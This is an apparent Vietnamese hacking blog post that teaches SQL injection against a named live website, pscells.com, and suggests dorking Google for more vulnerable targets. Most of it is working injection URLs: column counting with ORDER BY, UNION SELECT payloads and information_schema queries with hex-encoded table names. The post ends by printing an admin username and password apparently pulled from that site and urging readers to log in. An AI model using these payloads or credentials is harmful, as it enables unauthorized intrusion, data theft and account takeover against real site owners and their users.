Tiên akira dẽ hướng dẫn bạn khai thác 1web bị lỗi sql

Tiên akira dẽ hướng dẫn bạn khai thác 1web bị lỗi sql

03:16

XIN CHÀO MỌI NGƯỜI HÔM NAY MÌNH SẼ HƯỚNG DẪN CHO CÁC BẠN KHAI THÁC WEBSITE LỖI SQL
•Cần Chuẩn Bị :

1.Hackbar -> Goole  Search -> " Hackbar "    ( Mozilla Firefox Nhé )
•Bây Giờ Tiến Hành Với Victim Nhé !

Victim : http://pscells.com ( Hoặc Có Thế Lên Google Gõ "inurl:index.php?id=" Để Dork tìm Site Bị Lỗi SQL )


 Tìm Link Ở Site Có Dạng ?id=

Chẳng hạn như link này : http://pscells.com/chitietsanpham.php?id=40


Tiếp Theo Kiểm Tra Lỗi Bằng Cách Thêm Dấu ' Vào Và Ta Đc Link Như Thế Này :


http://pscells.com/chitietsanpham.php?id=40'


Nếu Site Có Lỗi Thì Nó Sẽ Hiện Như Thế này :

Sau Đó Dùng Lệnh Order By Để Tìm Số Cột (Column)


http://pscells.com/chitietsanpham.php?id=40 order by 5-- - ==> Ko Lỗi
http://pscells.com/chitietsanpham.php?id=40 order by 10-- - ==> Lỗi

Vậy : 5 < x < 10


Tìm Tiếp :
http://pscells.com/chitietsanpham.php?id=40 order by 7-- - ==> Ko Lỗi
Vậy : 7 < x < 10
Tiếp Nào :
http://pscells.com/chitietsanpham.php?id=40 order by 9-- - ==> Lỗi
Vậy : 7 < x < 9 ===> Thế Số Cột (Column) Là 8 Nhé


Bây h Dùng Lệnh UNION SELECT để khai thác nó
Vậy ta sẽ dùng lệnh UNION SELECT với số cột là 8


Ta Sẽ Có Link :
http://pscells.com/chitietsanpham.php?id=40 UNION SELECT 1,2,3,4,5,6,7,8-- -


Trường Hợp Vài Site Khi Khai Thác Lệnh Này Xoq Vẫn Ko Thấy Gì ==> Cách Giải Quyết :


Thay Null Vào ?id=40 Có Nghĩa Là Link Sẽ Thành :


http://pscells.com/chitietsanpham.php?id=null UNION SELECT 1,2,3,4,5,6,7,8-- -



Nếu Cột Nào Đó Từ 1 -> 8 Bị Lỗi Sẽ Xuất Hiện Như Hình :





Vậy Cột 6 Bị Lỗi Nhé
Bây giờ ta khai thác với lệnh như sau:


http://pscells.com/chitietsanpham.php?id=null UNION SELECT 1,2,3,4,5,group_concat(table_name),7,8 from information_schema.tables where table_schema=database()-- -


( Thay Thế Group_concat(table_name) vào số cột bị lỗi mà ta đã tìm hồi nãy ( cột 6 ) , Thêm from information_schema.tables where table_schema=database() Để Tìm Ra Cách Table Có Trong Database )


Và Sau Đó Ta Đc Các Table Của Database Như Hình :

Lưu Ý Chúng Ta Cần Tìm ID và Pass Của Admin , Nên Ta Sẽ Chọn Table Có Liên Quan Đến Tài Khoản Người Dùng . Như Troq Hình Là Table " Taikhoan "

Tiếp Theo Tìm Các Column Trong Table taikhoan . Cần Phãi Encode tên table sang mã Hex Và thêm trước nó "0x" Để Hệ Thống Biết Đó Là Mã Hex . Mã Hex cũa taikhoan là 7461696b686f616e Thêm "0x" ỡ đầu sẽ thành :
0x7461696b686f616e <== Thay Mã Hex này Với Database() như Hình :


Và Sửa Link ỡ 1 vài chỗ :


http://pscells.com/chitietsanpham.php?id=null UNION SELECT 1,2,3,4,5,group_concat(table_name),7,8 from information_schema.tables where table_schema=database()-- -


Thành


http://pscells.com/chitietsanpham.php?id=null UNION SELECT 1,2,3,4,5,group_concat(column_name),7,8 from information_schema.columns where table_name=0x7461696b686f616e-- -


Ta sẽ được:




Như hình trên. Ta được 1 ID Admin Là :


ID: Admin
Pass : @#123@#


Số 1 Là Số User troq site ^^


Thế là xong ! Tìm link admin và đăng nhập vào thôi ^_^

About

This is dummy text. It is not meant to be read. Accordingly, it is difficult to figure out when to end it. But then, this is dummy text. It is not meant to be read. Period.

Next
« Prev Post
Previous
Next Post »

ConversionConversion EmoticonEmoticon

:)
:(
=(
^_^
:D
=D
=)D
|o|
@@,
;)
:-bd
:-d
:p
:ng
:lv
Đăng ký: Đăng Nhận xét (Atom)